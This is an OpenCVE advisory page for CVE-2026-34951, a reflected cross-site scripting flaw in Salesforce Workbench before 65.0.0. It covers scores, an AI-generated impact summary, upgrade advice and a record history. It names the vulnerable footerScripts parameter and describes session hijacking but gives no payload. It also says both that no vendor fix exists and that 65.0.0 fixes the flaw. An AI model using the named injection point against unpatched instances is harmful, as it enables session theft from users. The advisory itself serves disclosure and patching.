Description
Workbench is a suite of tools for administrators and developers to interact with Salesforce.com organizations via the Force.com APIs. Prior to 65.0.0, Workbench contains a reflected cross-site scripting vulnerability via the footerScripts parameter, which does not sanitize user-supplied input before rendering it in the page response. Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Workbench allows XSS Targeting Error Pages. This vulnerability is fixed in 65.0.0.
Published: 2026-04-06
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Reflected cross-site scripting enabling session hijack
Action: Patch
AI Analysis

Impact

Workbench, a Salesforce integration tool, has a reflected XSS flaw in footer.php triggered by the footerScripts parameter. The input is not sanitized before rendering in the page response, allowing an attacker to inject arbitrary JavaScript that executes in the context of any authenticated user that visits the crafted URL. This Javascript can steal session cookies or perform other malicious actions, effectively hijacking the user’s session.

Affected Systems

The vulnerability affects the Workbench suite provided by forceworkbench for interacting with Salesforce.com. Versions prior to 65.0.0 are impacted. Users running any older release should treat the system as vulnerable.

Risk and Exploitability

The CVSS score of 5.1 indicates a moderate severity, while the EPSS score is below 1% and the issue is not listed in KEV, suggesting it is not widely exploited yet. The attack path requires a malicious link containing a crafted footerScripts value that an authenticated user will click. Once executed, the injected script gains the privileges of the victim user, allowing session hijack and potential further attacks.

Generated by OpenCVE AI on April 14, 2026 at 21:46 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Workbench to version 65.0.0 or later, where the footerScripts input is properly sanitized.
  • Verify the upgrade has been applied on all instances of the tool.
  • If an upgrade cannot be performed immediately, limit the use of high‑privilege accounts when using the vulnerable version and avoid clicking suspicious links.
  • Consider implementing web application firewall rules to block or sanitize the footerScripts parameter.

Generated by OpenCVE AI on April 14, 2026 at 21:46 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 14 Apr 2026 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Salesforce
Salesforce workbench
CPEs cpe:2.3:a:salesforce:workbench:*:*:*:*:*:*:*:*
Vendors & Products Salesforce
Salesforce workbench

Tue, 07 Apr 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 07 Apr 2026 00:00:00 +0000

Type Values Removed Values Added
First Time appeared Forceworkbench
Forceworkbench forceworkbench
Vendors & Products Forceworkbench
Forceworkbench forceworkbench

Mon, 06 Apr 2026 16:45:00 +0000

Type Values Removed Values Added
Description Workbench is a suite of tools for administrators and developers to interact with Salesforce.com organizations via the Force.com APIs. Prior to 65.0.0, Workbench contains a reflected cross-site scripting vulnerability via the footerScripts parameter, which does not sanitize user-supplied input before rendering it in the page response. Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Workbench allows XSS Targeting Error Pages. This vulnerability is fixed in 65.0.0.
Title Reflected XSS in footer.php in Workbench Allows Attackers to Hijack Authenticated Sessions
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Forceworkbench Forceworkbench
Salesforce Workbench
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-07T14:18:59.617Z

Reserved: 2026-03-31T17:27:08.661Z

Link: CVE-2026-34951

cve-icon Vulnrichment

Updated: 2026-04-07T14:18:48.440Z

cve-icon NVD

Status : Analyzed

Published: 2026-04-06T16:16:38.170

Modified: 2026-04-14T20:28:26.730

Link: CVE-2026-34951

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-15T16:30:09Z

Weaknesses